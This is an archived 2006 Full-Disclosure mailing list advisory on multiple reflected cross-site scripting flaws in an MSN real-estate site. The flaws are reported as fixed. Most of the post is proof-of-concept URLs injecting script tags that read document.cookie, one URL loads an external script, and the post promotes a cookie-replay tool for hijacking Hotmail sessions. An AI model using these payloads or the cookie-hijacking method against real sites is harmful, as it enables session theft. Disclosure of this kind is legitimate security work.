lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 13 Sep 2006 23:10:47 -0000
From: <securma@...x.org>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Hotmail/MSN Multiple cross site scripting ( XSS )

Title: Hotmail/MSN Multiple cross site scripting ( XSS ) 

Author:  Securma Massine
MorX Security Research Team
http://www.morx.org

Original Advisory/Xploit : http://www.morx.org/msnxss.txt

Vulnerability : Multiple cross site scripting ( XSS ) 
 
Severity: Medium/High

Description : msn.com is suffers from multiple xss which could allow an attacker to hijack web sessions .This vulnerability can be used to gather the victim's cookies,steal his session,..

Proof of Concept/Example of the issue: a great number of XSS (hundred )in http://realtor.realestate.msn.com

they is only some examples :

http://realtor.realestate.msn.com/Default.asp?poe="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/websearch/searchresults.asp?searchterms="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fan&miss=loc&ad=http%3A%2F%2Frealtor.realestate.msn.com%2FFindNeig%2Fdefault.asp%3Flnksrc%3DREALR2LF2C0058%26poe%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

http://realtor.realestate.msn.com/SiteMap.asp?lnksrc=RDC-NAV-0005&poe="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/RealtyTimes/marketconditions.asp?link=http://yoursite/xss.js?open&pID=r.com2

http://realtor.realestate.msn.com/PersPlanOut/ArticleEmail.asp?anm=REALTOR%2Ecom%3A+Real+Estate+101&alnk=http%3A%2F%2Frealtor%2Erealestate%2Emsn%2Ecom%2Fbasics%2Findex%2Easp%3Flnksrc%3DREALR2LF2C0039%26poe%3D%22%3E%3Cscript%3Ealert%28document%2Ecookie%29%3B%3C%2Fscript%3E

http://realtor.realestate.msn.com/FindReal/WhichPages.asp?frm=byctst"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Basics/AllAbout/TypesStyles/Index.asp?poe="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/NearbySearch.asp?frm=bymlsid"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/websearch/searchresults.asp?searchterms=Bad%20Credit&amp;lnksrc=OVER_SRCH_RDC1"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Gateways/MSN/Default.asp?ct="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fan&miss"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindReal/WhichPages.asp?frm=byctst""&ct="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/InterimSearch.asp?typ=1%2C+2%2C+3%2C+4%2C+5%2C+6%2C+7&mxprice=99999999&mlsttl=&mnbath=0&frm=bymap&pgnum=1&st=CA&mls=xmls&mnbed=0&js=on&ct=Orange&zp=&mnprice=0&areaid="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/california/nborange.asp?"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fah&miss=loc&typ="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/default.asp?mode=MLS&"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/default.asp?mode=City&"><script>alert(document.cookie);</script>&poe=realtor

and many many other.....

Screen captures: http://www.morx.org/msnx.jpg

workaround: The Hotmail exploit can easily be executed via , e-mails , links ,messenger , attachement. 
you can use this tool to open the browser with fake hotmail's cookie(IE):
http://www.morx.org/hotcookie.exe

Disclosure timeline:
07/30/2006 Issue disclosed to Microsoft 
07/30/2006 Response received from secure@...rosoft.com 
09/05/2006 fix some xss 
09/07/2006 sending to microsoft new list of msn xss 
12/09/2006 announce the fix of all the xss in 24h
13/09/2006 fixed
14/09/2006 public advisory


Greets: Attitude and all morx team

Disclaimer: 
The author do not have any responsibility for any malicious use of this advisory or proof of concept code. The code and the information provided here are for educational purposes only.
comments or additional questions feel free to email me at securma_at_morx_org.









Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists